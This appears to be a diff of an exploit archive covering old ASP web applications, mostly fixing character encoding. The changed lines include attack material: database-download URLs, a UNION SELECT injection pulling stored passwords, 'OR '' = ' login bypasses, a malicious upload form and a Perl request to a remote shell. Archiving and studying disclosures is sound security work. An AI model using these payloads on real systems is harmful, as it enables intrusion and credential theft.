+| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
 | # Bug      : DB                                                                      | 
 ======================      Exploit By indoushka       =================================
 | # Exploit  : 

platforms/asp/webapps/10778.txt

@@ -5,7 +5,7 @@
 | # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
 | # Web Site : www.iq-ty.com                                                           |
 | # Script   : makit news/blog poster v3.1                                             |
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
+| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
 | # Bug      : DB                                                                      | 
 ======================      Exploit By indoushka       =================================
 | # Exploit  : 

platforms/asp/webapps/10780.txt

@@ -5,7 +5,7 @@
 | # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
 | # Web Site : www.iq-ty.com                                                           |
 | # Script   : Battle Blog                                                             |
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
+| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
 | # Bug      : DB                                                                      | 
 ======================      Exploit By indoushka       =================================
 | # Exploit  : 

platforms/asp/webapps/10823.txt

@@ -16,27 +16,27 @@
 
 ==============================================================================  
 
-        [»] ~ Note : Mutlu Yillar Millettt
+        [»] ~ Note : Mutlu Yillar Millettt
 
 ==============================================================================  
 
-        [»]UranyumSoft Ýlan Servisi Database Disclosure Vulnerability  
+        [»]UranyumSoft Ýlan Servisi Database Disclosure Vulnerability  
 
 ==============================================================================  
 
    
 
-    [»] Script:             [ UranyumSoft Ýlan Servisi  ]  
+    [»] Script:             [ UranyumSoft Ýlan Servisi  ]  
 
-    [»] Language:           [ ASP ]  
+    [»] Language:           [ ASP ]  
 
-    [»] Download:           [ http://aspindir.com/Goster/5420] 
+    [»] Download:           [ http://aspindir.com/Goster/5420] 
 
-    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com }
+    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com }
 
-    [»] My Home:            [ RevengeHack.com ]  
+    [»] My Home:            [ RevengeHack.com ]  
 
-    [»]N0T3    :             Yeni Aciklarimi Bekleyin.
+    [»]N0T3    :             Yeni Aciklarimi Bekleyin.
 
 
 ###########################################################################  
@@ -47,14 +47,14 @@
 
    
 
-  [»] http://server/[dizin]/database/db.mdb
+  [»] http://server/[dizin]/database/db.mdb
 
  
 
 
-  [»] Copyright 2008 UranyumSoft.com | Tüm haklarý saklýdýr.
+  [»] Copyright 2008 UranyumSoft.com | Tüm haklarý saklýdýr.
 
-  [»]   Admin Page: /yetki.asp
+  [»]   Admin Page: /yetki.asp
 
 
 

platforms/asp/webapps/10883.txt

@@ -16,27 +16,27 @@
 
 ==============================================================================  
 
-        [»] ~ Note : Mutlu Yillar Millettt
+        [»] ~ Note : Mutlu Yillar Millettt
 
 ==============================================================================  
 
-        [»] BlogWorx Blog Database Disclosure Vulnerability  
+        [»] BlogWorx Blog Database Disclosure Vulnerability  
 
 ==============================================================================  
 
    
 
-    [»] Script:             [ BlogWorx Blog ]  
+    [»] Script:             [ BlogWorx Blog ]  
 
-    [»] Language:           [ ASP ]  
+    [»] Language:           [ ASP ]  
 
-    [»] Download:           [ http://devworx.somee.com/] 
+    [»] Download:           [ http://devworx.somee.com/] 
 
-    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com }
+    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com }
 
-    [»] My Home:            [ RevengeHack.com ]  
+    [»] My Home:            [ RevengeHack.com ]  
 
-    [»]N0T3    :             Yeni Aciklarimi Bekleyin.
+    [»]N0T3    :             Yeni Aciklarimi Bekleyin.
 
 
 ###########################################################################  
@@ -47,11 +47,11 @@
 
    
 
-  [»] http://server/db/users.mdb Or db/teadmin.mdb
+  [»] http://server/db/users.mdb Or db/teadmin.mdb
                                       
 
 
-  [»] © 2008 devworx - devworx.somee.com
+  [»] © 2008 devworx - devworx.somee.com
 
   
 

platforms/asp/webapps/10903.txt

@@ -16,27 +16,27 @@
 
 ==============================================================================  
 
-        [»] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi
+        [»] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi
 
 ==============================================================================  
 
-        [»]Mini-NUKE v2.3 Freehost  Multi Vulnerability 
+        [»]Mini-NUKE v2.3 Freehost  Multi Vulnerability 
 
 ==============================================================================  
 
    
 
-    [»] Script:             [  Mini-NUKE v2.3 Freehost  ]  
+    [»] Script:             [  Mini-NUKE v2.3 Freehost  ]  
 
-    [»] Language:           [ ASP ]  
+    [»] Language:           [ ASP ]  
 
-    [»] Download:           [ http://aspindir.com/Goster/3543] 
+    [»] Download:           [ http://aspindir.com/Goster/3543] 
 
-    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com }
+    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com }
 
-    [»] My Home:            [ RevengeHack.com and Ar-ge.Org ]  
+    [»] My Home:            [ RevengeHack.com and Ar-ge.Org ]  
 
-    [»]N0T3    :             Yeni Aciklarimi Bekleyin.
+    [»]N0T3    :             Yeni Aciklarimi Bekleyin.
 
 
 ###########################################################################  
@@ -47,15 +47,15 @@
 
    
 
-  [»] http://server/db/mn7O4Z6J7L5W.mdb 
+  [»] http://server/db/mn7O4Z6J7L5W.mdb 
 
-  [»] http://server/setup.asp
+  [»] http://server/setup.asp
 
 
  
 
 
-  [»] bu site motoru copyright © 2004 mini-nuke v2.3 kullanýlarak hazýrlanmýþtýr
+  [»] bu site motoru copyright © 2004 mini-nuke v2.3 kullanýlarak hazýrlanmýþtýr
  
 
 

platforms/asp/webapps/10940.txt

@@ -16,27 +16,27 @@
 
 ==============================================================================  
 
-        [»] ~ Note : Baska Biri Bulduysa Affettsin :D
+        [»] ~ Note : Baska Biri Bulduysa Affettsin :D
 
 ==============================================================================  
 
-        [»]Football Pool v3.1   Database Disclosure Vulnerability  
+        [»]Football Pool v3.1   Database Disclosure Vulnerability  
 
 ==============================================================================  
 
    
 
-    [»] Script:             [   Football Pool v3.1 ]  
+    [»] Script:             [   Football Pool v3.1 ]  
 
-    [»] Language:           [ ASP ]  
+    [»] Language:           [ ASP ]  
 
-    [»] Download:           [ http://aspindir.com/Goster/742] 
+    [»] Download:           [ http://aspindir.com/Goster/742] 
 
-    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com }
+    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com }
 
-    [»] My Home:            [ RevengeHack.com ]  
+    [»] My Home:            [ RevengeHack.com ]  
 
-    [»]N0T3    :             Yeni Aciklarimi Bekleyin.
+    [»]N0T3    :             Yeni Aciklarimi Bekleyin.
 
 
 ###########################################################################  
@@ -47,14 +47,14 @@
 
    
 
-  [»] http://revengehack.com/[dizin]/data/NFL.mdb
+  [»] http://revengehack.com/[dizin]/data/NFL.mdb
 
  
 
 
-  [»] asp football pool v3.1 © 1999-2009 by mike hall. or 2009 Football Pool
+  [»] asp football pool v3.1 © 1999-2009 by mike hall. or 2009 Football Pool
 
-  [»]   Admin Page: /userLogin.asp
+  [»]   Admin Page: /userLogin.asp
 
 
 

platforms/asp/webapps/10955.txt

@@ -22,9 +22,9 @@
   
 ===[ Exploit SQL ]===
   
-[ª]SQL : [Path]/details&newsID=[inj3ct C0dE]
+[ª]SQL : [Path]/details&newsID=[inj3ct C0dE]
  
-[ª]dem0:
+[ª]dem0:
  
 http://www.site.com/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users
 

platforms/asp/webapps/10972.txt

@@ -16,27 +16,27 @@
 
 ==============================================================================  
 
-        [»] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi
+        [»] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi
 
 ==============================================================================  
 
-        [»]Acidcat CMS v 3.5  Multi Vulnerability 
+        [»]Acidcat CMS v 3.5  Multi Vulnerability 
 
 ==============================================================================  
 
    
 
-    [»] Script:             [  Mini-NUKE v2.3 Freehost  ]  
+    [»] Script:             [  Mini-NUKE v2.3 Freehost  ]  
 
-    [»] Language:           [ ASP ]  
+    [»] Language:           [ ASP ]  
 
-    [»] Download:           [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free] 
+    [»] Download:           [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free] 
 
-    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com }
+    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com }
 
-    [»] My Home:            [ RevengeHack.com and Ar-ge.Org ]  
+    [»] My Home:            [ RevengeHack.com and Ar-ge.Org ]  
 
-    [»]N0T3    :             Yeni Aciklarimi Bekleyin.
+    [»]N0T3    :             Yeni Aciklarimi Bekleyin.
 
 
 ###########################################################################  
@@ -47,15 +47,15 @@
 
    
 
-  [»] http://server/[dizin]/databases/acidcat_3.mdb
+  [»] http://server/[dizin]/databases/acidcat_3.mdb
 
-  [»] http://server/[dizin]/install.asp
+  [»] http://server/[dizin]/install.asp
 
 
  
 
 
-  [»] Powered by Acidcat CMS v 3.5.1.f
+  [»] Powered by Acidcat CMS v 3.5.1.f
  
 
 

platforms/asp/webapps/11005.txt

@@ -16,27 +16,27 @@
 
 ==============================================================================  
 
-        [»] ~ Note : Mutlu Yillar Millettt
+        [»] ~ Note : Mutlu Yillar Millettt
 
 ==============================================================================  
 
-        [»]KMSoft Guestbook v 1.0 Database Disclosure Vulnerability  
+        [»]KMSoft Guestbook v 1.0 Database Disclosure Vulnerability  
 
 ==============================================================================  
 
    
 
-    [»] Script:             [ KMSoft Guestbook v 1.0 ]  
+    [»] Script:             [ KMSoft Guestbook v 1.0 ]  
 
-    [»] Language:           [ ASP ]  
+    [»] Language:           [ ASP ]  
 
-    [»] Download:           [ http://kmsoft.org] 
+    [»] Download:           [ http://kmsoft.org] 
 
-    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com }
+    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com }
 
-    [»] My Home:            [ RevengeHack.com & Ar-ge.Org]  
+    [»] My Home:            [ RevengeHack.com & Ar-ge.Org]  
 
-    [»]N0T3    :             Yeni Aciklarimi Bekleyin.
+    [»]N0T3    :             Yeni Aciklarimi Bekleyin.
 
 
 ###########################################################################  
@@ -47,14 +47,14 @@
 
    
 
-  [»] http://server/[dizin]/db/db.mdb
+  [»] http://server/[dizin]/db/db.mdb
 
  
 
 
-  [»] KMSoft Guestbook v 1.0 Powered by KMSoft or  Powered by KMSoft
+  [»] KMSoft Guestbook v 1.0 Powered by KMSoft or  Powered by KMSoft
 
-  [»]   Admin Page: /admin
+  [»]   Admin Page: /admin
 
 
 
@@ -64,7 +64,7 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng
 Ar-ge.Org :Cyber_945,D3xer
 
                  
-- Kritik Benim,Kritigi Ben Bellerim,Kýzdýrmayýn Benim Alayinizi Keserim
+- Kritik Benim,Kritigi Ben Bellerim,Kýzdýrmayýn Benim Alayinizi Keserim
 - Ben Ne Heykirlar Gordum  site heyklicek exploiti yok.Ben Ne exploitler gordum kullancak heykir yok :D
 
                                  

platforms/asp/webapps/11008.txt

@@ -6,7 +6,7 @@
 | # DAte     : 16/12/2009                                                                                                                                       
 | # Web Site : www.iq-ty.com                                                           
 | # Script   : Powered by YP Portal MS-Pro                     
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0                               
+| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0                               
 | # Bug      : DB                                                                      
 ======================      Exploit By indoushka       =================================
  # Exploit  : 

platforms/asp/webapps/11015.txt

@@ -6,7 +6,7 @@
 | # Web Site : www.iq-ty.com 
 | # Dork     : Lebi soft Ziyaretci Defteri_v7.5                                                                                                                             
 | # Script   : (VP-ASP Shopping Cart 7.0) Copyright (c) 1999-2010 Rocksalt International.                         
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0                              
+| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0                              
 | # Bug      : DB                                                                    
 ======================      Exploit By indoushka       =================================
 | # Exploit  : 

platforms/asp/webapps/11016.txt

@@ -6,7 +6,7 @@
 | # Web Site : www.iq-ty.com 
 | # Dork     : netGitar.com - Shop v1.0                                                                                                                               
 | # Script   : (VP-ASP Shopping Cart 7.0) Copyright (c) 1999-2010 Rocksalt International.                         
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0                              
+| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0                              
 | # Bug      : DB                                                                    
 ======================      Exploit By indoushka       =================================
 | # Exploit  : 

platforms/asp/webapps/11018.txt

@@ -7,7 +7,7 @@
 | # Dork     : Copyright 1999-2010 Rocksalt International Pty Ltd. All rights reserved 
 | # Dork1    : VP-ASP Shopping Cart 7.0                                                                                                                               
 | # Script   : (VP-ASP Shopping Cart 7.0) Copyright (c) 1999-2010 Rocksalt International.                         
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0                              
+| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0                              
 | # Bug      : DB                                                                    
 ======================      Exploit By indoushka       =================================
  # Exploit  : 

platforms/asp/webapps/11023.txt

@@ -1,26 +1,26 @@
 ==============================================================================  
 
-        [»] ~ Note : Mutlu Yillar Millettt
+        [»] ~ Note : Mutlu Yillar Millettt
 
 ==============================================================================  
 
-        [»] Erolife AjxGaleri VT  Database Disclosure Vulnerability  
+        [»] Erolife AjxGaleri VT  Database Disclosure Vulnerability  
 
 ==============================================================================  
 
    
 
-    [»] Script:             [ Erolife AjxGaleri VT  ]  
+    [»] Script:             [ Erolife AjxGaleri VT  ]  
 
-    [»] Language:           [ ASP ]  
+    [»] Language:           [ ASP ]  
 
-    [»] Download:           [ http://www.aspindir.com/goster/4322] 
+    [»] Download:           [ http://www.aspindir.com/goster/4322] 
 
-    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com - LionTurk.Turkblog.com }
+    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com - LionTurk.Turkblog.com }
 
-    [»] My Home:            [ RevengeHack.com & Ar-ge.Org ]  
+    [»] My Home:            [ RevengeHack.com & Ar-ge.Org ]  
 
-    [»]N0T3    :             Yeni Aciklarimi Bekleyin.
+    [»]N0T3    :             Yeni Aciklarimi Bekleyin.
 
 
 ###########################################################################  
@@ -31,4 +31,4 @@
 
    
 
-  [»] http://localhost/path/db/ajxgaleri.mdb
+  [»] http://localhost/path/db/ajxgaleri.mdb

platforms/asp/webapps/11096.txt

@@ -7,26 +7,26 @@
 
 
 ==============================================================================
-        [»] ABB v1.1 Forum Remote Database Disclosure Vulnerability
+        [»] ABB v1.1 Forum Remote Database Disclosure Vulnerability
 ==============================================================================
 
-    [»] Script:             [ ABB Forums ]
+    [»] Script:             [ ABB Forums ]
-    [»] Language:           [ ASP ]
+    [»] Language:           [ ASP ]
-    [»] Site page:          [ Possede de tres nombreuses options d administration et de configuration ]
+    [»] Site page:          [ Possede de tres nombreuses options d administration et de configuration ]
-    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
+    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
-    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
+    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
-    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
+    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
 
 ###########################################################################
 
 ===[ Exploit ]===
 
-    [»] http://server/[path]/fpdb/abb.mdb
+    [»] http://server/[path]/fpdb/abb.mdb
 
 
 ===[ Admin Login ]===
 
-    [»] http://server/[path]/admin.asp
+    [»] http://server/[path]/admin.asp
 
 
 Author: ViRuSMaN <-

platforms/asp/webapps/11097.txt

@@ -11,27 +11,27 @@
 ========================================================================
 
 ======
-        [»] ~ Note : [ Tribute to the martyrs of Gaza . ]
+        [»] ~ Note : [ Tribute to the martyrs of Gaza . ]
 ========================================================================
 
 ======
-        [»] Egreetings v1.0 b Remote Database Disclosure Vulnerability
+        [»] Egreetings v1.0 b Remote Database Disclosure Vulnerability
 ========================================================================
 
 ======
 
-    [»] Script:             [ Egreetings ]
+    [»] Script:             [ Egreetings ]
-    [»] Language:           [ ASP ]
+    [»] Language:           [ ASP ]
-    [»] Site page:          [ Systeme d envoie de cartes de voeux ]
+    [»] Site page:          [ Systeme d envoie de cartes de voeux ]
-    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
+    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
-    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
+    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
-    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
+    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
 
 ###########################################################################
 
 ===[ Exploit ]===
 
-    [»] http://server/[path]/kort.mdb
+    [»] http://server/[path]/kort.mdb
 
 Author: ViRuSMaN <-
 

platforms/asp/webapps/11098.txt

@@ -7,21 +7,21 @@
 
 
 ==============================================================================
-        [»] E-membres v1.0 Remote Database Disclosure Vulnerability
+        [»] E-membres v1.0 Remote Database Disclosure Vulnerability
 ==============================================================================
 
-    [»] Script:             [ E-membres ]
+    [»] Script:             [ E-membres ]
-    [»] Language:           [ ASP ]
+    [»] Language:           [ ASP ]
-    [»] Site page:          [ Elle contient la partie d administration des membres ]
+    [»] Site page:          [ Elle contient la partie d administration des membres ]
-    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
+    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
-    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
+    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
-    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
+    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
 
 ###########################################################################
 
 ===[ Exploit ]===
 
-    [»] http://server/[path]/db/bdEMembres.mdb
+    [»] http://server/[path]/db/bdEMembres.mdb
 
 
 Author: ViRuSMaN <-

platforms/asp/webapps/11295.txt

@@ -11,7 +11,7 @@ Arbitrary File Upload
 <form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data "> 
 <p align="center"> 
 <input type=file name=uploadfile size=100><br> <br> 
-<input type=submit value=Upload>  </p>
+<input type=submit value=Upload>  </p>
 </form> 
 
 

platforms/asp/webapps/11361.txt

@@ -1,16 +1,16 @@
 ==============================================================================
-        [»] fipsForum v2.6 Remote Database Disclosure Vulnerability
+        [»] fipsForum v2.6 Remote Database Disclosure Vulnerability
 ==============================================================================
 
-    [»] Script:             [ fipsForum ]
+    [»] Script:             [ fipsForum ]
-    [»] Language:           [ ASP ]
+    [»] Language:           [ ASP ]
-    [»] Site page:          [ fipsForum is a simple and easy to use Forum System with a MS Access database. ]
+    [»] Site page:          [ fipsForum is a simple and easy to use Forum System with a MS Access database. ]
-    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
+    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
-    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
+    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
-    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
+    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]
 
 ###########################################################################
 
 ===[ Exploit ]===
 
-    [»] http://server/[path]/_database/forumFips.mdb
+    [»] http://server/[path]/_database/forumFips.mdb

platforms/asp/webapps/11606.txt

@@ -26,7 +26,7 @@
 #
 #      http://site/admin/index.asp
 # 
-#      Användarnamn(Username) : 'OR '' = '
+#      Användarnamn(Username) : 'OR '' = '
-#      Lösenord(password)     : 'OR '' = '
+#      Lösenord(password)     : 'OR '' = '
 #
 ################################################################################################

platforms/asp/webapps/11611.txt

@@ -4,7 +4,7 @@
 | # email    : indoushka@hotmail.com                                                   
 | # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                                
 | # Web Site : http://scripti.org/i/ucuzalsat.zip                         
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.1                              
+| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.1                              
 | # Bug      : ASP DB Download                                                                    
 ======================      Exploit By indoushka       =================================
  # Exploit  : 

platforms/asp/webapps/12218.txt

@@ -4,7 +4,7 @@
 | # email    : indoushka@hotmail.com                                                   
 | # Home     : www.iqs3cur1ty.com/vb     
 | # Web Site : http://dl.p30vel.ir/scripts/smans(www.p30vel.ir){a.allahparast}.zip                                                                            
-| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
+| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
 | # Bug      : Backup Dump                                                                      
 ======================      Exploit By indoushka       =================================
  # Exploit  : 

platforms/asp/webapps/12471.txt

@@ -7,7 +7,7 @@
 --------------------------------------------------------------------------------------
 #####################Sid3^effects aKa HaRi##################################
 #Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
-#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR
+#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR
 #ShouTZ:kedar,dec0d3r,41.w4r10r     
 #Catch us at www.andhrahackers.com or www.teamicw.in
 ############################################################################
@@ -75,8 +75,8 @@ DEMO : TO change the admin login details and other info..
         <input type=text name=Adminlevel value="Root">
       </td>
     </tr>
-      <td width="168"> </td>
+      <td width="168"> </td>
-      <td width="220"> </td>
+      <td width="220"> </td>
     </tr>
     <tr> 
       <td colspan="2">        

platforms/asp/webapps/12478.txt

@@ -1,38 +1,38 @@
 ==============================================================================  
 
-        [»] ~ Note : LionTurk.Turkblog.com Resmi Web Sitem :D
+        [»] ~ Note : LionTurk.Turkblog.com Resmi Web Sitem :D
 
 ==============================================================================  
 
-        [»]Mesut Manþet Haber V1.0 Auth Bypass Vulnerability  
+        [»]Mesut Manþet Haber V1.0 Auth Bypass Vulnerability  
 
 ==============================================================================  
 
-    [»] Script:             [ Mesut Manþet Haber V1.0 ]  
+    [»] Script:             [ Mesut Manþet Haber V1.0 ]  
-    [»] Language:           [ ASP ]  
+    [»] Language:           [ ASP ]  
-    [»] Download:           [ http://www.aspindir.com/goster/5377] 
+    [»] Download:           [ http://www.aspindir.com/goster/5377] 
-    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com - LionTurk.Turkblog.com }
+    [»] Founder:            [ LionTurk -  Bylionturk@kafam1milyon.com - LionTurk.Turkblog.com }
-    [»] My Home:            [ RevengeHack.com & Ar-ge.Org ]  
+    [»] My Home:            [ RevengeHack.com & Ar-ge.Org ]  
-    [»] N0T3   :             Yeni Aciklarimi Bekleyin.
+    [»] N0T3   :             Yeni Aciklarimi Bekleyin.
 
 
 ###########################################################################  
 
 ===[ Exploit And Dork  ]===  
 
-  [»] http://lionturk.turkblog.com/[dizin]/admin/admin_haber.asp or 
+  [»] http://lionturk.turkblog.com/[dizin]/admin/admin_haber.asp or 
                                  /admin/admin_haber.asp?islem=ekle_kaydet
 
-            Ýn the Admin panel
+            Ýn the Admin panel
 
-  [»] Mesut Manþet Haber
+  [»] Mesut Manþet Haber
 
 
 Author:  LionTurk <-  
 
 - Turk'uz Varmi Otesi?
 
-           Dandirik Scriptler Kullanmayýn.
+           Dandirik Scriptler Kullanmayýn.
 
 
 ########################################################################### 

platforms/asp/webapps/12527.txt

@@ -12,7 +12,7 @@
 
 **  Risk  :        High
 
-**  Dork :         "Diseño Web Hernest Consulting S.L."
+**  Dork :         "Diseño Web Hernest Consulting S.L."
 
 ************************************************************
 

platforms/asp/webapps/12571.txt

@@ -28,12 +28,12 @@ http://localhost/[path]/controlpanel/
 
 -------------------------------------------------------------------------------------------
 
-Öyle bir özlemişim ki seni
+Öyle bir özlemişim ki seni
-Artık dönsen de olur dönmesen de
+Artık dönsen de olur dönmesen de
 Ben her daim yine sana sitemli yine sana hasret giderim
 Aziz yar sen bir sabah bu şehri başıma yıkıp gittin
-Dağları deviriverdin üstüme hiç çekinmedin
+Dağları deviriverdin üstüme hiç çekinmedin
-Ben bu şehirde bir daha da sabah görmedim
+Ben bu şehirde bir daha da sabah görmedim
-Günaydınlar olmadı günler aymadı sensiz ........
+Günaydınlar olmadı günler aymadı sensiz ........
 
 ------------------------------------------------------------------------------------------- 		 	   		  

platforms/asp/webapps/12693.txt

@@ -25,5 +25,5 @@
 **
 ** Greetz to :     ALLAH
 **         All Members of  http://www.DZ4All.cOm/Cc
-**          And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n & 
+**          And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n & 
 *********************************************************** 		 	   		  

platforms/asp/webapps/12701.txt

@@ -5,7 +5,7 @@
 **  Home   :         N/A
 **  Vunlerability :        SQL Injection
 **  Risk  :        High
-**  Dork :         "Sitedesign by: Dieleman www.dieleman.nl - Copyright © 2010"
+**  Dork :         "Sitedesign by: Dieleman www.dieleman.nl - Copyright © 2010"
 ************************************************************
 ** Discovred by:    Ra3cH
 ** From           :    Algeria

platforms/asp/webapps/13789.txt

@@ -14,7 +14,7 @@ greetz to :All ICW members.
 ###############################################################################################################
 Description:
 
-Looking for a Real Estate Listing script? Our Virtual Real Estate Manager was developed in ASP ( Active Server Pages ) and an Access database. End User Features : » Search by Area and type of property » Listings Page includes thumbnail of the property, Short Description, city, date added and price. » Details Page includes - 4 thumbnails that open in a new window with larger view. Heading, Description of the property, Details of the property, email to a friend and request more info. Admin Features : » Add, Edit and Delete Properties - upload images » Add, Edit and Delete Categories » Add, Edit and Delete Area » Change Password VRM : Is delivered via a ZIP file. You receive this exact template with the application. Easy to customize with knowledge of html or one of the following: Design Requirements : Front page - Recommended * Macromedia Dreamweaver Configuration Requirements: Notepad WordPad 
+Looking for a Real Estate Listing script? Our Virtual Real Estate Manager was developed in ASP ( Active Server Pages ) and an Access database. End User Features : » Search by Area and type of property » Listings Page includes thumbnail of the property, Short Description, city, date added and price. » Details Page includes - 4 thumbnails that open in a new window with larger view. Heading, Description of the property, Details of the property, email to a friend and request more info. Admin Features : » Add, Edit and Delete Properties - upload images » Add, Edit and Delete Categories » Add, Edit and Delete Area » Change Password VRM : Is delivered via a ZIP file. You receive this exact template with the application. Easy to customize with knowledge of html or one of the following: Design Requirements : Front page - Recommended * Macromedia Dreamweaver Configuration Requirements: Notepad WordPad 
 
 ###############################################################################################################
 

platforms/asp/webapps/13793.txt

@@ -4,7 +4,7 @@ Version:1.0
 Price:$149.97
 Vendor url:http://dmxready.com/?product=online-notebook-manager
 Published: 2010-06-09
-Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer,d3c0d3r and to all ICW members
+Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer,d3c0d3r and to all ICW members
 ###############################################################################################################################################################################################
 
                                                                                                            Online Notebook Manager SQLi Vulnerability

platforms/asp/webapps/13842.txt

@@ -33,14 +33,14 @@ Spl Greetz to:inj3ct0r.com Team
 Description:
 
 VU Web Visitor Analyst is an application that retrieves your website
-visitors’ IP address, visited date and time, visited page name, the link a
+visitors’ IP address, visited date and time, visited page name, the link a
 visitor came from originally (referred URL address). You can view the single
 visitor history with the list of all pages visited. You can also display
 visits by date criteria. The weekly statistics allow you to see the total
 visits for every single day in the present and last weeks. The monthly
 statistics allow you viewing the total visits of every month for the whole
 year. In addition, every visitor is linked to the web database containing
-personal information about this visitor’s IP address (such as name, address,
+personal information about this visitor’s IP address (such as name, address,
 phone, email, etc. if available).
 Pleasant and professional graphic user interface will make your statistical
 experience more enjoyable.

platforms/asp/webapps/13891.html

@@ -22,8 +22,8 @@ Sex
 </select>
 </p>
 <p>Avatar :<input type="text" name="icon" size="49" value="icon"></p>
-<p><EFBFBD></p>
+<p> </p>
-<p><EFBFBD></p>
+<p> </p>
 
 </form>
 </frewal>

platforms/asp/webapps/14030.pl

@@ -54,7 +54,7 @@ $xpl = LWP::UserAgent->new() or die;
 $req = HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect.");
 $res = $xpl->request($req);
